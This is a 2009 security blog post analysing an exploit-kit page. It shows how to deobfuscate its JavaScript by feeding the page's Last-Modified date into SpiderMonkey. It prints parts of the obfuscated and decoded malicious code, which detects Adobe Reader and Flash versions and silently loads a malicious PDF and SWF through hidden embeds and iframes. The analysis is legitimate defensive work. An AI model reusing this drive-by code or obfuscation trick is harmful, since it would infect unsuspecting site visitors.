Pages

Nov 15, 2009

Javascript lastmodified technique

Today I’ve found a website that told to have fragus botnet exploit kit.

After reviewing the page source code, it turns out to be using ‘lastmodified’ technique to make deobfuscation process harder. (Read here)

var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...


By checking the HTTP Header request, we can replace the Last Modified Date into the variable for further analysis.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Content-Type: text/html; charset=WINDOWS-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT

Replace the variable with the value of Last Modified Date and edit it to make spidermonkey js interpret the output;

window = print;
document = print;
var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp="Fri, 12 Dec 2008 11:11:35 GMT",
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...
...
...
print(ajkq);
};

bcfknv();

And now we are ready to decode the JavaScript with spidermonkey js interpreter. Below are the output;
function cfmqsy(){}

function jloqy(){
var ijqstv=false;
if(navigator.plugins && navigator.plugins.length){
for(var bfntv=0;bfntv < navigator.plugins.length;bfntv++){
if(navigator.plugins[bfntv].description.indexOf('Adobe Acrobat')!=-1){
ijqstv=true;
break;
}

if(navigator.plugins[bfntv].description.indexOf('Adobe PDF')!=-1){
ijqstv=true;
break;
}
}
}

else if(window.ActiveXObject){
var kyzvnb=null;

try{
kyzvnb=new ActiveXObject('AcroPDF.PDF');
} catch(e){}

if(!kyzvnb){
try{
kyzvnb=new ActiveXObject('PDF.PdfCtrl');
}
catch(e){}
}

if(kyzvnb){ijqstv=true;}
}

if(ijqstv){
var ua=navigator.userAgent.toLowerCase();
if(ua.indexOf("firefox")!=-1){
var fjwx=document.createElement('embed');
fjwx.width='1';
fjwx.height='1';
fjwx.src='./egilrw.pdf';
fjwx.type='application/pdf';
document.body.appendChild(fjwx);
}
else{
var fjwx=document.createElement('iframe');
fjwx.setAttribute('src','. < strong>/egilrw.pdf < /strong>');
fjwx.setAttribute('width',10);
fjwx.setAttribute('height',10);
fjwx.setAttribute('style','display:none;');
document.body.appendChild(fjwx);
}

...
...
...

function opvy(){
var PlayerVersion=[0,0,0];
if(navigator.plugins && navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];

if(x && x.description){
PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");
}
}

else{
try{
var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if(fv!=null){
PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
}
} catch(e){abhmry();return;
}
}

var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;
var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;
var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;

if(version1==9 && version3 < 124){
var ua=navigator.userAgent.toLowerCase();

if(ua.indexOf("firefox")!=-1){
var swfelement=document.createElement('embed');
document.body.appendChild(swfelement);
swfelement.width='1';
swfelement.height='1';
swfelement.src='. < strong>/manual.swf < /strong>';
swfelement.type='application/x-shockwave-flash';

...
...
...

}

jloqy();

From the code, we can identify that it tries to attack the vulnerabilities of Adobe Reader and Flash.

Downloaded the malicious PDF file that they’ll push when user visit the site. Gonna take a look at it later.